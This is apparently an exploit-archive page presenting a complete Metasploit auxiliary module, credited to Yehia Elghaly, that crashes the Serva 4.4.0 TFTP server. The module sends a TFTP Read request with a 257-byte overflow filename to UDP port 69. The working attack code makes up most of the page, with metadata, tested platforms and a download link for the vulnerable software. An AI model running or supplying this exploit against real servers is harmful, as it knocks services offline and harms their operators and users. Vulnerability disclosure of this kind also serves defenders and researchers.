Serva 4.4.0 TFTP Remote Buffer Overflow

2021.11.24

Credit: Yehia Elghaly

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-119

# Exploit Title: Serva 4.4.0 TFTP Server Remote Buffer Overflow (Metasploit)
# Date: 2021-11-23
# Exploit Author: Yehia Elghaly
# Vendor Homepage: https://www.vercot.com/
# Software Link : https://www.vercot.com/~serva/download/Serva_Community_v4.4.0-21081411.zip
# Tested Version: 4.4.0
# Tested on: Windows XP SP3 - Windows 7 Professional x86 SP1 - Windows 10 x64
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Udp
include Msf::Auxiliary::Dos
Rank = ExcellentRanking
def initialize(info = {})
super(update_info(info,
'Name' => 'Serva 4.4.0 TFTP Remote Buffer Overflow',
'Description' => %q{
The Serva TFTP server version 4.4.0 can be
brought down by sending a special Read request.
},
'Author' => 'Yehia Elghaly',
'License' => MSF_LICENSE,
'DisclosureDate' => '2021-11-23'))
register_options([Opt::RPORT(69)])
end
def run
connect_udp
print_status("Sending Read request...")
sploit = "\x00\x01"
sploit += "A" * 257
sploit += "\x00"
sploit += "netascii"
sploit += "\x00"
udp_sock.put(sploit)
disconnect_udp
end
end

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Serva 4.4.0 TFTP Remote Buffer Overflow

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.